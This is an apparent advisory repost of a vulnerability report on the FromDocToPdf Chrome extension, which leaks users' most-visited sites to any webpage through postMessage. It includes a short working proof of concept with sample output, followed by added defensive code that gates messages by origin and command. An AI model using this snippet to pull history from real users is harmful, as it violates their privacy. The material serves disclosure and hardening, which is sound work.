FromDocToPdf Browser History Disclosure

2018.04.18
Credit: Tavis Ormandy
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

FromDocToPdf: exposes browsing history to all websites

I noticed this extension with 20 million users:

https://chrome.google.com/webstore/detail/fromdoctopdf/mallpejgeafdahhflmliiahjdpgbegpk/internal?hl=en-US

The extension is pretty low quality, thankfully a lot of the scarier stuff seems to be disabled in Chrome, but it does expose browsing history to all pages (!!), any website can do this:

    > window.addEventListener("message", function(msg) { JSON.parse(msg.data).data.forEach(function(a) { console.log(a.title, a.url);}) })
    > window.postMessage(JSON.stringify({destination: "mallpejgeafdahhflmliiahjdpgbegpk", cmd: "mostVisitedSites"}), "*")
    Example Domain http://www.example.com/
    Hacker News http://news.ycombinator.com/
    ...

As far as I can tell, this can't be used for anything other than leaking private data, so filing as low priority. I notified the CWS team, although I'm not sure how this extension managed to get 20M users, perhaps that requires some investigation.

If the PoC is large, feel free to attach it as an attachment.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Found by: taviso
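Added example (not part of the original report and not the extension's own code): the checks a content script can apply before answering a page's postMessage request, next to the accept-anything behaviour the report implies. The trusted origin, the command allowlist and all function names are assumptions; only the extension ID and the mostVisitedSites command come from the report.

```javascript
// Added illustration, not FromDocToPdf's code. Only EXTENSION_ID and the
// "mostVisitedSites" command come from the report; the rest is assumed.
const EXTENSION_ID = "mallpejgeafdahhflmliiahjdpgbegpk";
const TRUSTED_ORIGINS = new Set(["https://vendor.example"]); // assumed first-party page
const PAGE_SAFE_COMMANDS = new Set(["ping"]);                // assumed, nothing private

// Parse a message body defensively; returns an object or null.
function parseRequest(data) {
  if (typeof data !== "string") return null;
  try {
    const req = JSON.parse(data);
    return req !== null && typeof req === "object" ? req : null;
  } catch { return null; }
}

// Behaviour the report implies: naming the extension is the only requirement.
function permissiveAccepts(event) {
  const req = parseRequest(event.data);
  return req !== null && req.destination === EXTENSION_ID;
}

// Hardened gate: same window, allowlisted origin, allowlisted command.
function hardenedAccepts(event, pageWindow) {
  if (event.source !== pageWindow) return false;         // not a sub-frame or popup
  if (!TRUSTED_ORIGINS.has(event.origin)) return false;  // sender origin allowlist
  const req = parseRequest(event.data);
  if (req === null || req.destination !== EXTENSION_ID) return false;
  return PAGE_SAFE_COMMANDS.has(req.cmd);                // history never page-reachable
}

// Constructed MessageEvent-like samples (plain objects so this runs under Node).
const pageWindow = {};
function sampleEvent(origin, cmd, source = pageWindow) {
  return { origin, source, data: JSON.stringify({ destination: EXTENSION_ID, cmd }) };
}

function demo() {
  const events = {
    anySiteHistory: sampleEvent("https://unrelated.example", "mostVisitedSites"),
    vendorHistory: sampleEvent("https://vendor.example", "mostVisitedSites"),
    vendorPing: sampleEvent("https://vendor.example", "ping"),
    framePing: sampleEvent("https://vendor.example", "ping", {}),
  };
  return Object.fromEntries(Object.entries(events).map(([name, ev]) =>
    [name, { permissive: permissiveAccepts(ev), hardened: hardenedAccepts(ev, pageWindow) }]));
}
console.log(demo());
```

When the hardened gate does accept a request, the reply should be posted with event.origin as the target origin rather than "*", so the response cannot be read by a different origin that has since loaded in the window.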



Copyright 2024, cxsecurity.com

 
